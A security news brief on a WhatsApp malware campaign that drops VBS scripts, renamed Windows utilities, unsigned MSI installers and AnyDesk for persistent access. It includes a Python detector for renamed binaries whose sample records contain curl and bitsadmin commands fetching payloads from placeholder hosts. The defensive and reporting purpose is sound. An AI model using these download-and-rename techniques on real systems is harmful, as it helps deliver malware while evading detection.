www.microsoft.com 3/31/2026, 3:04:57 PM

WhatsApp malware campaign delivers VBS payloads and MSI backdoors


Microsoft Defender Security Research Team has detailed a WhatsApp-based malware campaign that began in late February 2026, delivering malicious Visual Basic Script (VBS) files via WhatsApp messages. Once executed, the scripts establish a multi-stage infection chain to achieve persistence and remote access, using renamed Windows utilities such as curl[.]exe renamed to netapi[.]dll and bitsadmin[.]exe renamed to sc[.]exe to blend in with normal activity.
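As an added example (not code from Microsoft's report or from this article), the renamed-utility pattern above can be surfaced by comparing the on-disk file name of a new process against the PE version resource's OriginalFileName, which Sysmon Event ID 1 records. The records below are constructed, and the field names assume a Sysmon-style JSON export.

```python
import ntpath

# Constructed Sysmon-style process-creation records (assumption: JSON export
# with Image and OriginalFileName fields). Paths and hosts are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\u\AppData\Local\Temp\netapi.dll",
     "OriginalFileName": "curl.exe",
     "CommandLine": "netapi.dll -s -o Setup.msi https://bucket.invalid/Setup.msi"},
    {"Image": r"C:\Users\u\AppData\Local\Temp\sc.exe",
     "OriginalFileName": "bitsadmin.exe",
     "CommandLine": "sc.exe /transfer j /download /priority high https://h.invalid/a a"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe https://h.invalid/"},
    {"Image": r"C:\Windows\System32\sc.exe",
     "OriginalFileName": "sc.exe",
     "CommandLine": "sc.exe query"},
    # Binary without version info: Sysmon reports "-" or "?", which must not alert.
    {"Image": r"C:\Tools\custom.exe", "OriginalFileName": "-", "CommandLine": "custom.exe"},
]


def is_renamed_utility(event):
    """True when the file name on disk differs from the embedded OriginalFileName."""
    image_name = ntpath.basename(event.get("Image", "")).lower()
    original = event.get("OriginalFileName", "").strip().lower()
    # Missing or unknown version info is not evidence of renaming.
    if original in ("", "-", "?"):
        return False
    return image_name != original


def find_renamed(events):
    """Return (on-disk name, original name) pairs for every mismatching event."""
    return [
        (ntpath.basename(ev["Image"]), ev["OriginalFileName"])
        for ev in events
        if is_renamed_utility(ev)
    ]


if __name__ == "__main__":
    for disk_name, original in find_renamed(SAMPLE_EVENTS):
        print(f"renamed utility: {disk_name} is really {original}")
```

A legitimate renamed copy (for example a vendor's bundled curl) will also match, so triage the hit on its path and command line rather than blocking on the mismatch alone.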

The campaign retrieves additional payloads from trusted cloud services—Amazon S3 buckets in AWS, Tencent Cloud, and Backblaze B2—and then delivers malicious MSI installers, including Setup[.]msi, WinRAR[.]msi, LinkPoint[.]msi, and AnyDesk[.]msi, all unsigned. Final payloads enable attackers to establish remote access and maintain presence on compromised devices, with AnyDesk specifically cited as a tool used for persistent connectivity.

The operators also attempt to bypass User Account Control and modify registry entries under HKLM\Software\Microsoft\Win to suppress prompts and sustain a long-term foothold. Cloud hosting and legitimate utilities are employed to reduce detection, highlighting the blending of trusted services with malware delivery.


Article by CyberSIXT